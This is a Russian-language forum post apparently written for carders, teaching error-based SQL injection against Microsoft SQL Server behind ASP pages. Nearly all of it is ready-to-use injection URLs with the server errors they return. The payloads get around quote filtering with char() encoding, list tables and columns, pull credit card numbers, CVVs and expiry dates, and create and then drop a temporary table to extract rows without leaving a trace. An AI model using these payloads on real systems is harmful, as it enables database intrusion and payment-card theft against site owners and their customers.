Я не буду тут рассказывать об азах mssql инъекций, так как на эту тему написано и сказано уже очень много. Я хочу поделится некоторым своим опытом, набранным бессонными ночами, когда я ковырял гимморные ms sql инжекты и курил мануалы, пытаясь понять, что я делаю не правильно.
И так начнем с поиска инъекций на сайте. Иногда я встречал инжект в post запросах, в скриптах поиска по сайту или в скрипте напоминании пароля. В этом случае на традиционный запрос 1’+or+1=@@version-- скрипт будет ругаться примерно так:
Цитата:Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or'.
/inc/inc_customer.asp, line 103
ошибка возникает из за символа “+”, поэтому вот такой запрос:
1’ or 1=@@version--
в данном случае пройдет на ура и выдаст нам версию сервера.
Следующая проблема, которая вызывает массу вопросов у новичков, и которая в свое время тоже вогнала меня в ступор, это фильтрация кавычки. Она приводит к тому, что выполнив запрос:
Цитата:http://www.target.com/dinamica.asp?I...HEMA.TABLES)--
и получив имя первой таблицы, к примеру:
Цитата:[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'Pincodes' to data type int.
мы не можем получить имя второй, и вместо нее видим ответ:
Цитата:[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'Pincodes'.
В данном случае проблема может быть решена с помощью функции char(int ascii), превратив имя таблицы Pincodes в char(80)%2Bchar(105)%2Bchar(110)%2Bchar(99)%2Bchar (111)%2Bchar(100)%2Bchar(101)%2Bchar(115) и передав эти данные серверу:
Цитата:http://www.target.com/dinamica.asp?I..._NAME+NOT+IN+( char(80)%2Bchar(105)%2Bchar(110)%2Bchar(99)%2Bchar (111)%2Bchar(100)%2Bchar(101)%2Bchar(115)))--
мы получим имя второй таблицы:
Цитата:[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'PRODUCT' to data type int.
Самое главное, что если зачарить название таблицы, необходимость в кавычках пропадает. Чарим следующее имя таблицы и добавляем его через запятую, и так перебираем таблицу за таблицей. То же самое и с перебором полей в таблице, чарим имя таблицы и имена полей.
Идем дальше. Иногда хитромудрые админы употребляют в названии полей таблиц “-“, чем затрудняют вывод информации. К примеру:
Цитата:http://www.target.com/dinamica.asp?ID=1+or+1= (SELECT+TOP+1+cast(ccnumber+as+nvarchar)%2B%27%3A% 27%2Bcast(cvv+as+nvarchar)%2B%27%3A%27%2Bcast(expi re+as+nvarchar)+from+orders+where+orderid=CRX-40003)--
в этом случае сервер отвечает:
Цитата:Invalid column name 'CRX'.
так как часть имени поля идущая после “-“ обрезается. Это проблема обходиться в свою очередь добавлением кавычек вокруг проблемного названия поля:
Цитата:http://www.target.com/dinamica.asp?ID=1+or+1= (SELECT+TOP+1+cast(ccnumber+as+nvarchar)%2B%27%3A% 27%2Bcast(cvv+as+nvarchar)%2B%27%3A%27%2Bcast(expi re+as+nvarchar)+from+orders+where+orderid=’CRX-40003’)--
Иногда само название поля состоит из двух слов, между которыми находиться пробел:
Цитата:http://www.target.com/dinamica.asp?ID=1+or+1= (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=‘orders'+AND+COLUMN_NAME+ NOT+IN+('Account%20Number','Card%20Number','Expera tion%20Date','CVV%20Response'))—
и в этом случае, второе слово обрезается, что ставит некоторых новичков в тупик. Здесь проблема решается обрамлением квадратными кавычками такого названия:
Цитата:http://www.target.com/dinamica.asp?ID=1+or+1= (SELECT+TOP+1+[Card%20Number]+from+orders)--
И последнее, иногда находишь таблицу с очень интересными данными, но вывод их становится сложной задачей, так как ничего подобного типа orderid нет и близко, и как перебирать содержимое полей непонятно. В этом случае лучшим решением будет создание новой таблицы с полем id и копированием в нее нужных нам данных:
Цитата:http://www.target.com/dinamica.asp?ID=1;CREATE TABLE dbo.temp (Id int NOT NULL IDENTITY (1, 1), email varchar(255) NULL) ON [PRIMARY]; INSERT INTO temp (email) select email from orders;--
с последующим забором нужных нам данных:
Цитата:http://www.target.com/dinamica.asp?ID=1+or+1= (SELECT+TOP+1+email+from+temp+where+id=1)--
И как закончишь, не забудь убрать за собой, удалив таблицу:
Цитата:http://www.target.com/dinamica.asp?ID=1;drop table temp;--
Очень надеюсь, что поделившись с тобой моим скромным опытом, я уберег тебя от ночных нервотрепок, и помог сделать процесс извлечения данных из mssql чуточку просче.
durito